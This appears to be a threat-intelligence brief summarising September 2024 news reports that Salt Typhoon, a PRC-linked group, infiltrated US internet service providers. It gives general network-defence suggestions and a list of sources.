Executive Summary: 

  • PRC cyber threat actors dubbed “Salt Typhoon” (as well as FamousSparrow and GhostEmperor) appear to be focused on infiltrating Internet Service Providers (ISPs) at this time.
    • Why is this important? “If hackers gained access to service providers’ core routers, it would leave them in a powerful position to steal information, redirect internet traffic, install malicious software or pivot to new attacks.” 
  • Unlike similar threat actor groups that include the name “Typhoon,” Salt Typhoon looks to be geared towards intelligence collection as opposed to creating backdoors for the purpose of being an Advanced Persistent Threat (APT.) 
  • Suggestions for network defense include
    • Identify and mitigate living off the land techniques that could provide threat actors with an opportunity to infiltrate an enterprise network. (CISA resource)
    • Locate and remove or isolate unused and/or unpatchable legacy systems.
  • Potential link to “shadow C2 infrastructure”
    • By having access to the Internet Service Provider of an enterprise network, a threat actor could manipulate the network from the inside.


Highlights:

– Binary Defense revealed details of how it uncovered PRC state-sponsored cyber actors inside a global aerospace engineering firm’s network where they had been snooping around for four months. 

– “I can’t really comment on the connection between the incidents, but I can say that given the uptick in Chinese-linked attacks against critical infrastructure supply chains, ISPs, and core internet devices there is a clear strategy at play where attackers are aiming to identity and exploit logical choke points in our society to take control of the flow of information and supplies,” Binary Defense Director of Security Research John Dwyer told The Register today when asked about a possible Salt Typhoon connection.

– As recently as August, another Typhoon gang — Volt Typhoon — was accused of hiding in American networks after exploiting a high-severity bug in Versa’s SD-WAN software.

– WSJ article states Salt Typhoon threat actors attempt to gain critical data from broadband service providers, has been going on for months and has been linked to China by U.S. government investigators. The reason for targeting broadband providers, in particular, is to take control of those providers’ systems and, from there, access their data and possibly launch a separate cyberattack from within their networks.  

– CISA Executive Assistant Director for Cybersecurity Jeff Greene told us the agency is aware of the report of the compromised ISPs, and said that China is known to be infiltrating all manner of critical targets, who have compromised the IT environments across multiple critical infrastructure sectors and organizations.

– China’s Salt Typhoon cyber spies spotted deep inside US ISPs
Activity is confirmed, govt aid provided.
No advisory on mitigations for customers at this time

Resources:

Chinese spies spent months inside aerospace engineering firm’s network via legacy IT
(The Register, 18 September 2024)
https://www.theregister.com/2024/09/18/chinese_spies_found_on_us_hq_firm_network

China’s Salt Typhoon cyber spies are deep inside US ISPs
(The Register, 25 September 2024)
https://www.theregister.com/2024/09/25/chinas_salt_typhoon_cyber_spies

China-Linked Hackers Breach U.S. Internet Providers in New ‘Salt Typhoon’ Cyberattack
(The Wall Street Journal, 26 September 2024)
https://www.wsj.com/politics/national-security/china-cyberattack-internet-providers-260bd835

China-linked APT group Salt Typhoon compromised some U.S. internet service providers (ISPs)
(Security Affairs, 26 September 2024) – see graphic below
https://securityaffairs.com/168941/apt/salt-typhoon-china-linked-threat-actors-breached-us-isp.html 

Salt Typhoon Cyberattack Targets U.S. Broadband Service Provider
(TeleCompetitor, 27 September 2024)
https://www.telecompetitor.com/salt-typhoon-cyberattack-targets-u-s-broadband-service-providers/

Image Source: China-linked APT group Salt Typhoon compromised some U.S. internet service providers (ISPs) Security Affairs, 26 September 2024